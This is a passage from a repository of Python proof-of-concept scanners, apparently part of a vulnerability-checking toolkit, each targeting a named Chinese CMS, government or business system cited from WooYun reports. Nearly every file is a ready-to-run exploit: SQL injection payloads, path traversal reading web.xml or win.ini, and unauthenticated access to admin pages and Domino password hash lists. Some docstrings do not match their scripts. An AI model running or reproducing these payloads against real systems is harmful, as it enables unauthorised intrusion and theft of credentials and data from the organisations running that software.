10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class damall_selloffer_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/selloffer.html?key=%27AnD%20@@version=0%20or%27%%27=%27%"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if req.status_code == 500 and r"Microsoft SQL Server" in req.text:
28 | cprint("[+]存在damall商城系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = damall_selloffer_sqli_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/domino_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: domino_unauth未授权漏洞
5 | referer: unknow
6 | author: Lucifer
7 | description: lotus-domino未授权访问,可以获得用户名和密码hash列表,可通过破解弱口令进入系统
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class domino_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/names.nsf/$users"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"HTTPPassword" in req.text:
25 | cprint("[+]存在domino未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = domino_unauth_BaseVerify(sys.argv[1])
33 | testVuln.run()
34 |
--------------------------------------------------------------------------------
/pocs/cms/others/efuture_downloadAct_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: efuture商业链系统任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-066881
6 | author: Lucifer
7 | description: web/login/downloadAct.jsp FilePath参数存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class efuture_downloadAct_filedownload_BaseVerify():
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/web/login/downloadAct.jsp?FilePath=c://windows/win.ini&name=win.ini"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r"support" in req.text and r"MPEGVideo" in req.text:
28 | cprint("[+]存在efuture商业链系统任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = efuture_downloadAct_filedownload_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/gevercms_downLoadFile_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 金宇恒内容管理系统通用型任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-069009
6 | author: Lucifer
7 | description: 文件/adminroot/common/downLoadFile.jsp中,参数filepath存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class gevercms_downLoadFile_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/adminroot/common/downLoadFile.jsp?filepath=/WEB-INF/web.xml&filename=None"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在金宇恒内容管理系统通用型任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = gevercms_downLoadFile_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/gn_consulting_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: GN SQL Injection
5 | referer: unknown
6 | author: Lucifer
7 | description: GN SQL injection。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class gn_consulting_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/news_detail.php?sn=-7%27+/*!50000UnIoN*/+SeLeCt+1,2,3,Md5(1234),5,6,7--%20-"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在GN SQL Injection漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = gn_consulting_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/gxwssb_fileDownloadmodel_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天津神州助平台通用型任意下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-087767
6 | author: Lucifer
7 | description: 文件/gxwssb/fileDownloadmodel中,参数name存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class gxwssb_fileDownloadmodel_download_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/gxwssb/fileDownloadmodel?name=../WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在天津神州助平台通用型任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = gxwssb_fileDownloadmodel_download_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/hnkj_researchinfo_dan_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇能群管理系统SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2010-0152664
6 | author: Lucifer
7 | description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class hnkj_researchinfo_dan_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
25 | cprint("[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/huaficms_bypass_js.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 华飞科技cms绕过JS GETSHELL
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-083888
6 | author: Lucifer
7 | description: /admin/User/manageadmin.aspx 禁用JS可以直接访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class huaficms_bypass_js_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/admin/User/manageadmin.aspx"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if req.status_code == 200 and r"addadmin.aspx" in req.text:
28 | cprint("[+]存在华飞科技cms绕过JS GETSHELL漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = huaficms_bypass_js_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/jxt1039_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 1039驾校通未授权访问漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0132856
6 | author: Lucifer
7 | description: 1039驾校通通用型系统存在未授权漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class jxt1039_unauth_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/headmaster/Index.aspx"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"ShengQingPS.aspx" in req.text and r"LiuShuiZhang.aspx" in req.text:
27 | cprint("[+]存在1039驾校通未授权访问漏洞...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = jxt1039_unauth_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/kj65n_monitor_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: kj65n煤矿远程监控系统SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0148855
6 | author: Lucifer
7 | description:
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class kj65n_monitor_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/yhpc/trbl_deal_modi.asp?pActFlag=MODIFY&pId=-7653%27%20UnIoN%20AlL%20SeLeCt%20NuLL,NuLL,NuLL,NuLL,@@version,NuLL,NuLL,NuLL,NuLL,NuLL--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"Microsoft SQL Server" in req.text:
27 | cprint("[+]存在kj65n煤矿远程监控系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = kj65n_monitor_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/nongyou_Item2_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 农友政务系统Item2.aspx SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2010-0120498
6 | author: Lucifer
7 | description: 文件/newsymItemView/Item2.aspx中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class nongyou_Item2_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/newsymItemView/Item2.aspx?id=021973%27UnIoN%20AlL%20SeLeCt%20NuLl%2CNuLl%2CNuLl%2CNuLl%2CNuLl%2CNuLl%2CNuLl%2CCoNcAt%28Md5%281234%29%29%2CNuLl%2CNuLl%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在农友政务系统Item2.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = nongyou_Item2_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/shiyou_list_keyWords_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 师友list.aspx keywords SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-082296
6 | author: Lucifer
7 | description: 文件/webSchool/list.aspx中,参数keywords存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shiyou_list_keyWords_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/webSchool/list.aspx?keyWords=1%%27AnD/**/1>Sys.Fn_VarbinTohexstr(HashBytes(%27Md5%27,%271234%27))AnD/**/%27%%27=%27"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在师友list.aspx keywords SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = shiyou_list_keyWords_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/sinda_downloadfile_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 中农信达监察平台任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-069864
6 | author: Lucifer
7 | description: servlet/downloadfile?filename= 文件下载。/hzs/HTMLEditor/upload_img.jsp 任意文件上传。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class sinda_downloadfile_download_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/finance/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"" in req.text and r"" in req.text:
27 | cprint("[+]存在中农信达监察平台任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = sinda_downloadfile_download_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/skytech_bypass_priv.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: skytech政务系统越权漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-081902
6 | author: Lucifer
7 | description: skytech政务系统越权漏洞,泄露敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class skytech_bypass_priv_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/admin/sysconfig_reg_page.aspx"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 | if r"txtUserRights" in req.text and r"txtTitle" in req.text:
24 | cprint("[+]存在skytech政务系统越权漏洞...(敏感信息)\tpayload: "+vulnurl, "green")
25 |
26 | except:
27 | cprint("[-] "+__file__+"====>连接超时", "cyan")
28 |
29 | if __name__ == "__main__":
30 | warnings.filterwarnings("ignore")
31 | testVuln = skytech_bypass_priv_BaseVerify(sys.argv[1])
32 | testVuln.run()
33 |
--------------------------------------------------------------------------------
/pocs/cms/others/suntown_upfile_fileupload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: suntown未授权任意文件上传漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-063656
6 | author: Lucifer
7 | description: 文件/zhidao/zhidao/search.php中,参数fulltext存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class suntown_upfile_fileupload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/admini/upfile/upfile.aspx"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"PageA_name" in req.text and r"PageA_per" in req.text:
27 | cprint("[+]存在suntown未授权任意文件上传漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = suntown_upfile_fileupload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_Class_Info_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统Class_Info.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0147384
6 | author: Lucifer
7 | description: 文件Class_Info.aspx中,参数courseid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class tianbo_Class_Info_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/Web_Org/Class_Info.aspx?courseid=50%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"WtFaBcMicrosoft" in req.text:
27 | cprint("[+]存在天柏在线培训系统Class_Info.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = tianbo_Class_Info_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_St_Info_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统St_Info.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/Web_Org/St_Info.aspx中,参数typeid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class tianbo_St_Info_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/Web_Org/St_Info.aspx?typeid=3%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"WtFaBcMicrosoft" in req.text:
27 | cprint("[+]存在天柏在线培训系统St_Info.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = tianbo_St_Info_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_TCH_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统TCH_list.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0143143
6 | author: Lucifer
7 | description: 文件TCH_list.aspx中,参数typeid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class tianbo_TCH_list_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/Web_Org/TCH_list.aspx?typeid=9/**/AnD/**/1=CoNvErt(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"WtFaBcMicrosoft" in req.text:
27 | cprint("[+]存在天柏在线培训系统TCH_list.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = tianbo_TCH_list_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_Type_List_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统Type_List.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0144529
6 | author: Lucifer
7 | description: 文件Type_List.aspx中,参数typeid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class tianbo_Type_List_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/Web_Org/Type_List.aspx?typeid=1%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"WtFaBcMicrosoft" in req.text:
27 | cprint("[+]存在天柏在线培训系统Type_List.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = tianbo_Type_List_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/yeu_disclosure_uid.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 依友POS系统登陆信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0155657
6 | author: Lucifer
7 | description: 依友POS系统用户名列表泄露,且系统无验证码,可暴力破解登陆。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class yeu_disclosure_uid_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/Code/System/FunRepManage/SelFunOper.aspx?rid=0001"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"OperID" in req.text and r"OperName" in req.text:
27 | cprint("[+]存在依友POS系统登陆信息泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = yeu_disclosure_uid_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/zf_cms_FileDownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 某政府通用任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-068728
6 | author: Lucifer
7 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class zf_cms_FileDownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/cms/upload/FileDownload.jsp?id=020010040000092515&filepath=/WEB-INF/web.xml&downloadName=web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在某政府通用任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = zf_cms_FileDownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
